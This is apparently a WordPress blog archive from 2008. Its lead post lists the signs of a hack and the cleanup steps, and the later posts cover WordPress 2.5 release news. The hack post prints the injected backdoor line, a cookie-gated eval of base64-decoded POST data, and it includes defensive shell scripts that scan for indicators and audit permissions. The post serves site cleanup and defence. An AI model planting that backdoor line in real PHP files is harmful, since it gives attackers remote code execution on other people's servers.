Has Your WordPress Been Hacked Recently?
Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:
Extra code added to the first line of PHP files
<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>
Note that the letters and numbers in the hash vary from site to site.
Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file and reflect these changes on the server very quickly.
New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories
See if there are any files in writable directories that have the same name as an existing file but with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files are executable PHP scripts that, when called from a browser, display a fake “404 Not Found” error, but when called from a script with the matching hash from one of the hacked PHP scripts, display system info about the server your site is sitting on.
Solution: delete the files.
New files named wp-info.txt which contain database usernames and passwords
This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.
Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.
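The three file-based signs above (the injected first line, the dropped _new/_old/.pngg/.jpgg/.giff files, and the wp-info.txt dumps) can be checked in one pass instead of clicking through folders in an FTP client. The POSIX shell script below is an added example, not code from the original post or from WordPress: the function names, the fixture tree it builds, and the PLACEHOLDERHASH value are all constructed for the example. It looks only at the first line of each PHP file, which is where the post says the backdoor is inserted.

```shell
#!/bin/sh
# Added example (not from the original post): scan a WordPress document root
# for the three file-based indicators described in the post.

# Print every PHP file whose first line contains the "_wp_debugger" cookie
# check, the signature of the injected backdoor line.
find_injected_php() {
    root="$1"
    find "$root" -type f -name '*.php' | while read -r f; do
        if head -n 1 "$f" | grep -q '_wp_debugger'; then
            printf 'INJECTED %s\n' "$f"
        fi
    done
}

# Print files carrying the _new/_old suffixes or doubled extensions the post
# lists; such names never occur in a normal WordPress install.
find_dropped_files() {
    root="$1"
    find "$root" -type f \( -name '*_new.php' -o -name '*_old.php' \
        -o -name '*.php.pngg' -o -name '*.php.jpgg' -o -name '*.php.giff' \)
}

# Print any wp-info.txt credential dumps.
find_credential_dumps() {
    find "$1" -type f -name 'wp-info.txt'
}

# Run all three checks; one tagged line per finding.
scan_wp_root() {
    find_injected_php "$1"
    find_dropped_files "$1" | sed 's/^/DROPPED /'
    find_credential_dumps "$1" | sed 's/^/DUMP /'
}

# Build a constructed fixture tree so the scanner can be tried offline.
# The "infected" first line is a harmless stand-in: it carries the cookie
# name the scanner keys on but no eval() and a placeholder hash.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/uploads" "$d/wp-content/themes/default"
    printf '<?php\n// clean file\n' > "$d/index.php"
    printf '<?php if(md5($_COOKIE["_wp_debugger"])=="PLACEHOLDERHASH"){ /* constructed stand-in */ } ?>\n' \
        > "$d/wp-content/themes/default/header.php"
    printf 'x' > "$d/wp-content/uploads/image.php.pngg"
    printf 'x' > "$d/wp-content/themes/default/functions_old.php"
    printf 'x' > "$d/wp-content/uploads/wp-info.txt"
    printf '%s\n' "$d"
}

# Usage: sh scan.sh /path/to/wordpress
if [ "$#" -gt 0 ]; then
    scan_wp_root "$1"
fi
```

Run it against the document root over SSH rather than over FTP, and keep the list of findings: it tells you which files to clean by hand and which timestamps to look for in the access logs.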
New “WordPress” user in database (hidden in the admin panel users page)
One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.
Solution: delete the user. You need to access your database through phpMyAdmin or something similar.
WordPress version changed to 2.5
I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels says 2.5 now.
Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.
More signs
The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.
Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.
More Solutions
When it comes to security, there are a lot of possible culprits, but in this particular situation we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize enough how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.
However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first and then upload the new files. If you just upload and overwrite the old files, the injected files such as the _new, _old, .pngg, .jpgg and .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!
Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.
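A world-writable directory is a risk mainly where PHP can also run from it, so the audit worth doing is listing writable directories and noting which ones hold PHP files. The shell script below is an added example, not code from the original post or from WordPress; the function names and the fixture it builds are constructed, and the 755/644 baseline in harden_permissions is the common WordPress recommendation, assumed here to suit your host.

```shell
#!/bin/sh
# Added example (not from the original post): find world-writable directories
# in a WordPress tree and flag those that directly contain PHP files.

# Print each world-writable directory under $1, tagged WRITABLE+PHP when it
# holds .php files (the dangerous combination), otherwise WRITABLE.
audit_writable_dirs() {
    root="$1"
    find "$root" -type d -perm -002 | while read -r d; do
        if [ -n "$(find "$d" -maxdepth 1 -type f -name '*.php' | head -n 1)" ]; then
            printf 'WRITABLE+PHP %s\n' "$d"
        else
            printf 'WRITABLE %s\n' "$d"
        fi
    done
}

# Reset to the usual WordPress baseline: directories 755, files 644.
# The web server keeps read access; group and other lose write.
harden_permissions() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# Constructed fixture: an uploads folder and a theme folder both chmod 777,
# the way the post describes people leaving them for in-panel editing.
make_perm_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/uploads" "$d/wp-content/themes/default"
    printf '<?php\n' > "$d/wp-content/themes/default/index.php"
    printf 'x' > "$d/wp-content/uploads/photo.jpg"
    chmod 777 "$d/wp-content/uploads" "$d/wp-content/themes/default"
    printf '%s\n' "$d"
}

# Usage: sh perms.sh /path/to/wordpress   (audit only; call
# harden_permissions yourself once you have reviewed the list)
if [ "$#" -gt 0 ]; then
    audit_writable_dirs "$1"
fi
```

The audit is deliberately separate from the fix: on shared hosts the web server sometimes runs as your own user, in which case 755/644 is enough, while on others uploads genuinely need group write, so review the WRITABLE+PHP lines first and tighten those.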
I believe the most crucial problem here is the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.
Update (April 17): There’s now a WordPress Codex page for this issue.
Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).
Update (June 10): Check out this very helpful post by Donncha O Caoimh.
Technorati’s Ultimatum: Upgrade WordPress to 2.5 Now or Your Blog Will NOT Be Indexed
Now this comes as a surprise. Technorati has actually given an ultimatum to vulnerable WordPress blogs, saying that unless they upgrade to the latest, most secure version, 2.5, they will not be indexed.
Blogs that have been compromised by this security vulnerability are typified by having links to spam destinations inserted onto the blog page. These link insertions may be invisible to casual observations; the links are often obscured by style attributes that render them invisible. These links are still seen by crawlers such as Technorati’s, Google’s and Yahoo’s.
Technorati also mentions that blogs hosted on WordPress.com should not have this vulnerability.
I know Filipino bloggers are big fans of Technorati, so here’s yet another reason for you to upgrade to WordPress 2.5. Don’t worry, it’s not scary at all!
WordPress 2.5 Released
The long-awaited version of WordPress is finally here! WordPress 2.5 “Brecker” was released last March 29, and just about the same time the official WordPress website got a makeover to match the new administration panel.
2.5 is a major milestone for WordPress not because it added dozens of user-requested features, but because it reaffirms that we’re as passionate about blogging as the day we started. Our community is too fierce to rest on its laurels — contrary to what pundits claim, blogging is far from “finished” and every improvement just whets our appetite for more. And more is coming.
Version 2.5 had two release candidates before the final version and tons of discussions about its upcoming features, so those who have been keeping up-to-date probably already know what to expect. For those who don’t, better read it straight from the horse’s mouth. Here’s a shortlist:
User Features
- Cleaner, faster, less cluttered dashboard
- Dashboard Widgets
- Multi-file upload with progress bar
- EXIF extraction
- Search posts and pages
- Tag management
- Password strength meter
- Concurrent editing protection
- Few-click plugin upgrades
- Friendlier visual post editor
- Built-in galleries
Developer Features
- Salted passwords
- Secure cookies
- Easy taxonomy and URL creation
- Inline documentation
- Database optimization
- $wpdb->prepare()
- Media buttons
- Shortcode API
Theme and plugin issues shouldn’t be too major, but to be sure just check out the Codex for that.
WordPress 2.5 Delayed!
Weblog Tools Collection reports that the much-awaited release of WordPress 2.5 has been delayed by a week. People have written countless posts about preparing to take this major leap (especially since it skipped 2.4), while some are still hesitating.
According to the WordPress Trac, the WordPress team has reached only 58%, or closed 560 out of 966 tickets, so far. Here’s hoping there will be no more delays—or not, since you might be breathing a sigh of relief as you won’t have to scramble to update your site just yet.
WordPress 2.5 is now due on March 17, 2008.
WordPress 2.5 is Coming!
The WordPress community is buzzing about the WordPress 2.5 demo site, which is under heavy scrutiny, not to mention lots of malicious hackery. Still, it’s worth a look.
For those who don’t know, the developers are skipping WP 2.4 and heading straight to a version 2.5 release this March 10th. The Blog Herald has a great overview of all the things that need to be updated, be it themes or plugins, once WordPress 2.5 arrives. Of course, you can always check out the WordPress Codex page on the same topic.
WordPress Plugin: WordPress Automatic Upgrade
WordPress is pretty easy to install, but I’ve always hesitated to upgrade to the latest version, no matter how many times I’ve done so in the past. So imagine my sigh of relief when I discovered the WordPress Automatic Upgrade plugin.
Once activated, just head over to the plugin page (Manage > Automatic Upgrade) to begin the update. Here’s an idea of what the plugin does:
- Backs up the files and makes available a link to download it.
- Backs up the database and makes available a link to download it.
- Downloads the latest files from http://wordpress.org/latest.zip and unzips it.
- Puts the site in maintenance mode.
- De-activates all active plugins and remembers it.
- Upgrades wordpress files.
- Gives you a link that will open in a new window to upgrade installation.
- Re-activates the plugins.
The plugin can also be run in an automated mode wherein you do not have to click on any links to go to the next step.
Download WordPress Automatic Upgrade
Update to WordPress 2.3.3 Now!
Two months after the last upgrade, WordPress 2.3.3 is an urgent security release. It addresses an XML-RPC vulnerability that allows any user to edit any other user’s posts in the same blog, as well as some other bug fixes.
Now if updating seems too much of a chore right now and you only care about keeping your blog secure, get the updated xmlrpc.php file and you’re good to go.
Check out the whole announcement at the official WordPress blog.
WordPress 2.3.1
The latest stable release of WordPress as of this writing is 2.3.1. Changes from the previous version were mostly security and bug fixes.